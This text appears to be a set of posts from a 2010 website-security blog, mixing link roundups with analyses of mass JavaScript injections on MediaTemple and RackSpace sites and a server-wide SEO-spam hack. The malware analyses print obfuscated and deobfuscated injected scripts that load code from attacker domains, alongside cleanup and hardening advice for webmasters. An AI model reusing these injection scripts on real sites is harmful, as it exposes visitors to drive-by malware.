August 23, 2010

RT @briankrebs: Anti-virus products struggle against exploits — AV let malware get in in hope to stop it later?

[h-online.com] phpMyAdmin updates close vulnerabilities — both for v2.11.x and v3.x branches

August 27, 2010

[blog update] New wave of hacks on MediaTemple — new revisions of the same scripts

Transcript of a web chat “Applications’ Role in Protecting Users from Badware” – (with Adobe & Mozilla) via @stopbadware

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

August 16, 2010

[blog.s21sec.com] Dealing with Google’s malware warnings (in Spanish) — via @S21sec

August 17, 2010

[h-online.com] ColdFusion vulnerability more critical than first thought — passwords accessible via dir traversal

[armorize.com] thousands of sites were infected via a compromised NetworkSolutions widget: 1 & 2

August 18, 2010

[minor update] Unmask Parasites v0.5.242 http://www.UnmaskParasites.com/ – better detection of suspicious scripts

The sign that jQuery is very popular – hackers now inject malicious scripts from typo domains like “iguery .com” (link to safe browsing diagnostic page)

August 19, 2010

[Google Webmaster Central] You can verify site ownership in Webmaster Tools linking to your Google Analytics account

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

August 9, 2010

[Google Webmaster Forum] Massive SQL injections of “google-server43 (dot) info” – as always ASP(.NET) sites are affected

August 10, 2010

[softpedia.com] New Mass Injection Attack Adds Rogue Code to Existent JS Files

updated lists of Gumblar zombie URLs and hijacked subdomains

[wordpress.org] MediaTemple scans & cleans hacked websites of their clients — Google malware review is still required

August 12, 2010

[h-online.com] Botnet attacks SSH servers — phpMyAdmin vulnerability used to infect Linux servers

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

Almost everything remains the same as in the last week’s attack I described here. The only difference is the new script and the new remote malicious site – bl .pqshow .org.

Malicious script

var st1 = 0;document.write(unescape('%3C%73%63%72%69%70%74%3E%76%61%72%20%61%3D%64...skipped ...%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;

After two rounds of deobfuscation, we have the following external script:

<s cript type="text/javascript" src="hxxp://bl .pqshow .org/js/in.js"></script>

As a week ago, this script is either prepended to first lines of random .js files, or injected directly into web pages, enclosed into <ads>…</ads> tags (mainly when websites don’t use local .js file). The script itself (after the first round of deobfuscation) also resembles the last week’s script. The main difference is the use of a single domain name (bl .pqshow .org) instead of multiple combinations of 5 second level domains and 36 third level domains.

C I Host

As in all previous attacks against MediaTemple and RackSpace, the malicious server is hosted by C I Host (Florida, Tampa). I wonder if MediaTemple and RackSpace eventually decide to sue C I Host for continuous attacks on their networks, or just force them to shut down malicious servers.

Looking for common denominator

As far as I know, all those attacks affect sites on accounts that have at least one mySql-driven application (it may work on another domain but still under the same hosting account) . Let me know if your site is affected, but you don’t have any applications that work with mySql.

The modification dates of affected files remain unmodified. Most likely hackers use some PHP script that injects malicious code and then restores the original modification date using the touch command. Most likely they can also change file and directory permissions. Anyway, I still suggest that you make most files read-only for all (at least .js files and WordPress theme files). Please let me know if any of your read only files get affected by hackers.

You can find more information on how to recover from this hacking in my previous article.

Centralized clean-up

As far as I know, last time MediaTemple scanned their servers for infected files and removed the malicious content not waiting for their client help requests. To minimize undesired effects of such an automated clean-up they created back-up copies of affected files before changing their content. This is a really good deed. MediaTemple hosts many popular sites and this way they saved thousands of web surfers from malware attacks. They also helped some webmasters avoid site blacklisting. However webmasters of already blacklisted sites stilled needed to explicitly request malware reviews via Google Webmaster Tools to unblock their clean (at that moment) sites.

Today, Google reports 1,000+ sites affected with this “bl .pqshow .org” hack and many of them are still infected. Hope, it’s only a matter of time before MediaTemple runs their clean-up bots.

To MediaTemple

I want to hear from MediaTemple how exactly hackers manage to injects malicious scripts into web sites of their clients. If it’s a vulnerability in a third party software then let us know what exactly is vulnerable. If it’s is because of insufficiently strict file permissions, then let us know what are the secure permissions.

When hackers manage to compromise thousands of sites in a very short time, and do it again and again during this summer, they should leave traces. You should have all the logs and tools to find them. Compare access logs of affected sites and find common IPs and suspicious access patterns (e.g. access to .php files on WP blogs with a “pretty permalink” structure). Check who was logged in when this happened, who used mySql, etc. Create honeypot accounts.

I know this means a lot of work and a lot of data to analyze — but this is the only way to find out what makes such massive hacks possible. And once you find this out, you should close rogue accounts (if they exist) and then do exactly the same thing that hackers do to find vulnerable accounts and, instead of hacking them, close the security holes by yourselves or notify webmasters and instruct them on how to secure their sites (and I don’t mean general instructions here). Until you do it, your infrastructure should be considered insecure. The fact that you haven’t yet figured out the exact attack scenario and couldn’t prevent consecutive massive attacks only proves this. The same applies to RackSpace.

Update (Aug 27th, 2010): This week I see  a new wave of infections of MediaTemple sites.  A few new modifications of the same  script. They inject external scripts from new malicious domains (etufg .com, crocro .biz, shindigz .info) and the following subdomains (“keg“, “kei“, “ken“, “kep“, “kev“, “kex“, “key“, “khi“, “kid“, “kif“),  e.g.

<s cript type="text/javascript" src="hxxp://kif.crocro .biz/tools/js.js"></script>

Related posts:

• Malicious “ads” and “bars” on RackSpace & MediaTemple
• Attack on WordPress Blogs on RackSpace
• Network Solutions and WordPress Security Flaw
• Introduction to Website Parasites

The malicious script we are talking about is this:

var st1 = 0;this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";...skipped...g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("9e899ac889d59f8...skipped...1989cd6cfc195d3"); this.n=3279;this.O=58441;var gr0=0;

It is usually injected at the very top of random .js files. Note, hackers don’t add a new line of code to your .js files — they prepend this script t0 existing code on the first line. Everything after “this.O=58441;var gr0=0;” is your legitimate code — be careful when removing the malicious scripts.

In rare cases of infected web pages, this very script is injected either right after the <body> tag or right before the </html> tag. In either case it is enclosed in <ads>…</ads> tags.

This is a deobfuscated version of the script:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion;
if (document.cookie.indexOf("holycookie")==-1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win")!=-1){
var d = ["myads .name","adsnet .biz","toolbarcom .org","mybar .us","freead .name"],
e = ["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.","lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.","rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."],
f = Math.floor(Math.random()*d.length),
g = Math.floor(Math.random()*e.length);
dt = new Date;dt.setTime(dt.getTime()+9072E4);
document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/";
document.wr ite('<scr ipt type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/scr ipt>')
};

This script checks whether a visitor should be attacked (first time visitor on a Windows computer, not a search engine bot) and injects another script that loads content from a server controlled by cyber-criminals. To construct the address of that remote script, hackers use random items from the list of 5 second level domains: myads .name“, “adsnet .biz“, “toolbarcom .org“, “mybar .us“, “freead .name and the list of 36 prefixes (third level domains). This way we have 180 different full domain combinations (e.g. hex .freead .name or lax .toolbarcom .org etc.) that point to the save servers on C I Host network.

Predecessors of this attack

Two month ago I wrote about an attack that affected many WordPress blogs on RackSpace — now we have a next round of the same attack. Check how they both use lists of 5 second level domains hosted on C I Host along with long lists of third level domains to construct addresses of malicious remote sites.

There had also been an attack with a similar script on MediaTemple. It used the following four second level domains: ['edisonsnightclub .com','emapis .org','ideacoreportal .com','karenegren .com']

It’s clear that the same gang successfully attacks sites on RackSpace and MediaTemple again and again.

Prevalence estimates

At this point Google reports 3,000+ infected domains where the above five “ads” and “bars” sites are mentioned as an infection source. In my experience, this number in underestimated. Google only scans 10-20% of sites . When I checked sites on one affected IP address, I managed to find twice as much infected sites as Google. This mean that the real number of infected sites can be more than 6,000.

Mysterious security hole

At this point it is not clear how this attack works and what security hole is exploited. Although RackSpace & MediaTemple don’t acknowledge any security hole in their infrastructure, I still think that they might overlook certain weak point in their systems.

Let’s think logically. We have a series of attacks that mainly affect either MediaTemple or RackSpace or both hosting providers.

I doubt this could be a case of FTP credentials stolen from webmasters’ computers — I can hardly imagine malware that only affects clients of particular hosting providers.

And it cannot be a regular vulnerability in some third-party application, otherwise why would hackers limit their victims to sites hosted on RackSpace and MediaTemple? It would be much more efficient to target all vulnerable sites regardless of their location. Moreover, many affected sites are using the most recent, presumably secure versions of WordPress and Joomla.

It’s definitely some obscure inherent vulnerability. Security engineers of the both hosting providers have been investigating these issues for several months now but cannot either tell us how exactly hackers break into websites of their clients nor can they prevent subsequent massive hacks. They have all the logs and tools, but cannot trace the hackers. To my mind, this means that they don’t totally understand the nature of the attacks. They just do their usual rounds of security checks and system hardening procedures, but don’t properly address less known attack vectors.

But I hope it’s only a matter of time before these two (otherwise great) hosting providers finally figure out the whole scheme and will be able to properly protect they clients against such hacks.

Some brainstorming

As an external observer, I don’t have access to all the data required to investigate such attacks. I can only analyze publicly available information. At this point I can see that all affected sites use PHP applications that work with mySql (WordPress and Joomla). So could this be done via mySql? If someone has access to client’s databases, they can do a lot of things – create new admin users, inject malicious code into table (we saw it during the previous attack), use new application users to modify files on server using built-in theme/template editors, etc.

MediaTemple thinks this can be done using database passwords stolen from non-secure customer-installed software:

For the most recent customer attacks, we have found the most common way of gaining access is through non-secure customer-installed software. Vulnerable customer software (blogs, CMS, PHP apps) give attackers access to view and steal database passwords from application configuration files, illicitly inject code, and create backdoor access to user applications.

This may mean world-readable wp-config.php (WordPress) and configuration.php (Joomla) files. Ok. If you (MT & RS) know this, why not scan user accounts for world-readable wp-config.php and configuration.php files and notify users about this security hole, and recommend them to change database passwords and chmod the config files to 600? This proactive step could prevent last week’s massive hacks (of course, if you are right about the vector). However, this hasn’t been done yet (I just helped one webmaster recover his site from this hack and his wp-config.php was 644 and he thought it was perfectly fine).

One more thought. If someone steals admin credentials from user’s mySql database, he can use them to grant all required permissions to some rogue mySql user. In this scenario, when the legitimate user discovers the hack and changes mySql password, the hacker will still be able to modify that database using his own mySql account. So users of compromised sites should also check who has access to their databases (do they have enough permissions on shared servers to select from system tables?) Note, my knowledge of mySql is limited so these are just thoughts aloud. If you notice flaws here, please correct me in comments.

To webmasters

Since there is no reliable information about how this attack works and what webmaster can do to prevent hack, you should harden your sites as much as you can and hope one way or anther the security hole wil be closed.

MediaTemple and RackSpace provided very useful general sucurity resources that you should peruse and follow instructions found there:

• RackSpace – Recovering from and Dealing with a Site Compromise and
  almost identical MedaTemple – Fixing an infected website – (detailed steps)
• MediaTemple – Security Resources
• RackSpace – File Permissions

Securing static content

In this attack. hackers modify stand-alone .js files. Such files are considered static content since web applications don’t need to modify them. Once they are uploaded they should remain intact.

So here is the idea. Most people leave write permissions to owner for all files. This way, owners can modify their own files whenever they need to. So far so good. Unfortunately, all web applications (think PHP scripts) have the same write permissions when web servers use suEXEC or suPHP (this is common practice on shared servers). This means, that if web applications on your site have security holes or hackers managed to gain access to your WordPress or Joomla, it is possible for strangers to modify files on your server.

So why not revoke all write permissions for files that shouldn’t be modified? Just go and change permissions of your static content to 444. You can go a step further, and change permissions of all files that shouldn’t be modified by your web application to 400 (in case of scripts) and 500 or 555 (in case directories).

Of course this solution has its downsides

• you’ll need to change permissions when you need to modify files – it’s not a problem when you modify just one file.
• hackers can also change file permissions if they inject some php code into your scripts (say, via database or via remote script inclusion). However, only very sophisticated attack will do it (I can’t recall seeing malicious php scripts that tried to change file permissions).

So this way you can make your site a bit securer at expense of some added complexity.

P.S. And make sure that your WordPress wp-config.php or your Joomla configuration.php files are not word-readable. Their permission should be either 600 or even 400.

Have your say

Did I miss anything? I can only see those scripts from outside. There could be some less prominent internal changes. I’d like to gather all available information about this attack so that we can come up with working detection, clean up and prevention instructions.

Please share your thoughts and experience here. Please provide information about permission and modification dates of affected files, of configuration files (e.g. wp-config.php or configuration.php). Maybe you noticed something suspicious in access logs or in your database? Any information is welcome.

Related posts:

• Attack on WordPress Blogs on RackSpace
• Network Solutions and WordPress Security Flaw
• Introduction to Website Parasites
• Practical Guide to Dealing With Google’s Malware Warnings

August 3, 2010

[h-online.com] Blind Elephant leads the way in fingerprinting web applications – tool for hackers and security pros

[update] Unmask Parasites v0.5.237 http://www.UnmaskParasites.com – improved suspicious script detection

August 5, 2010

[h-online.com] Critical hole in Adobe Reader – and nobody wants to know

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

A year later, every now and then I still see servers affected by this sort of hack. I easily recognize recent modification of this attack when I see links to keygenguru .com in Unmask Parasites reports. Those modifications are slightly different from what I described in my goscanpark article. This time not only do the malicious processes serve JavaScript redirect code but also provide some HTML with links to pirated software and movies. This HTML code gets indexed by search engines which helps hackers promote their illegal resources.

Side effect

A side effect of this “black-hat SEO modification” is when people search for domain names of affected sites, they see something like this in search results:

crack download
serial key · serial number 249.211.87.154 Watch Avatar movie online … download movies · online movies. 51.239.154.87 … avira serial. 240.30.80.59 …
www.their-site-address.com/

The link address is correct, the title may be either correct or something like keygen, serial key, crack download, online movies, etc., and the result description is always a mix of warez keywords and random IP-addresses.

This side effect can help reveal the problem to webmasters. They see that Google has indexed erroneous content for some reason but they can neither find it on their site nor detect any other signs of a hack. No wonder, this attack works intermittently when hackers activate it — maybe several hours per week for random requests. Moreover, it’s a server-wide exploit and any individual user account on such a server is technically not hacked. That’s why it is very difficult to detect it even for experienced server administrators.

Prevalence estimates

To estimate the prevalence of this infection I used the following Google search:

“serial key” “online movies” “avira serial”

It returned 3,100 results. About 97% of them pointed to sites affected by this hacker attack. Their cached versions show that Google had indexed them in this June and July. (Warning: Don’t open the cached pages in your browser – they still contain malicious JavaScripts)

When I downloaded them, I could extract 300 unique domain names from 185 unique IP addresses from all over the world. Most of the IPs belong to shared servers with hundreds of sites. This means that there are currently about 20,000+ potentially affected websites.

I use the word potentially because this attack is not always active. At any given moment, only a small percentage of compromised servers exhibit malicious behavior. As outside observers we can only guess if the rest servers still contain backdoor scripts that can activate the attack.

185 compromised servers is probably an underestimation. This number only takes into account servers where the malicious processes were active when Googlebot indexed sites on those servers.

Server-wide searches

Using IP addresses of compromised servers I can show that this is really a server-wide infection. Bing search engine allows to narrow down searches to particular IP addresses. For example, here is a search that returns affected sites on server with IP 72.18.142.180

ip:72.18.142.180 serial

Keygenguru

Most of the links from the indexed hacked pages point to keygenguru .com site. It’s a search engine for serial numbers, keygens and other illegal pirate stuff. Its current Google PR is 6. According to Compete.com, 140,000 unique visitors come to this site every month. Its Alexa rank is 7,019 and according to Alexa, 35% of its visitors come from search engines, which is about 50,000 visitors every month. Again, according to Alexa, the most popular search keywords are the ones that we can see on the indexed hacked pages.

Of course, there are many “legitimate” (if we can call them so) links to keygenguru from warez sites and forums, so some part of its search ranking is “deserved”. However, even if we don’t pay attention to the legitimacy of the site’s content, I suggest that search engines take a closer look at black hat SEO tricks used by this site — they definitely don’t comply with search engines’ guidelines.

To webmasters

If your site is affected by this hack (you either discover erroneous “serial/keygen” description in your site’s search results or see unexpected keygenguru .com external references along with other “pirate” links in an Unmask Parasites report for your site) — this is a serious problem that only a server administrator with root access can properly resolve. As a site owner/webmaster you can either move your site to another host or notify the server administrator (hosting provider) about the problem and have them read this article and my previous article that contains technical details of the attack and all the information needed to find backdoor scripts and mitigate the issue.

If you are interested in my list of IPs of currently affected servers, you can find it here (it will expire in one month).

Have your say

There is still a lot remains unclear about this attack. Specifically, how this exploit manages to hijack Apache processes and if there is a reliable fix that can close the security hole. If you have any information about this issue, please share it in comments or contact me directly. Thanks!

Related posts:

• Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects
• Beladen – Elusive Web Server Exploit. (information for site owners and hosting providers)
• Introduction to Website Parasites

July 26, 2010

[stopbadware.org] Hijacked subdomains still serving malware

Are there online tools that can detect steganography in JPEG files?

July 28, 2010

RT @gcluley: Mozilla pulls password-sniffing Firefox add-on

July 29, 2010

Updated my list of Gumblar zombie URLs – now 1125 items

July 31, 2010

[techmixer.com] 5 Online Tools to detect harmful Websites

[lostintechnology.com] 7 Tools to Scan Websites for Viruses and Malware via @LostInTech

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

July 21, 2010

[zdnet.com] Adobe adding ’sandbox’ to PDF Reader to ward off hacker attacks

[h-online.com] Mozilla releases Firefox & Thunderbird security updates – 14 security issues addressed in FireFox update

July 22, 2010

[badwarebusters.org] There is a malware attack that only affects sites built with Soholaunch (affected sites via Google diagnostics)

Updated my list of Gumblar zombie URLs – now 1125 items

July 23, 2010

[milestone] 750,000 web pages checked by Unmask Parasites http://www.UnmaskParasites.com

[h-online.com] vBulletin divulges MySQL login – version 3.8.6 is vulnerable

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks

July 12, 2010

A lot of WordPress blogs on RackSpace Cloud are still hacked

July 13, 2010

Someone promotes shoponline2011 site via Image search spam. Check Alexa traffic details

July 15, 2010

Just found an #nginx site that redirects search traffic to scareware sites. Previously, such hacks were limited to Apache (mainly)

@baldown Good point. I forgot about this config where nginx is just a reverse proxy for Apache. Thanks.

July 16, 2010

WordPress Redirect Exploit (on MediaTemple)  and suggested clean-up (redirect to qooglesearch .com)

If http://www.UnmaskParasites.com reports script from “ae.awaue .com” for your WP blog, check this

[netcraft.com] Firefox security test add-on was backdoored

July 17, 2010

[forbes.com] “Millions” Of Home Routers Vulnerable To Web Hack

RT @gcluley: Video and detailed analysis of new zero-day Windows .LNK shortcut vulnerability (via @ChetWisniewski)

If you want more real-time experience, you can follow @UnmaskParasites on Twitter.

Related posts:

• Previous Tweet Weeks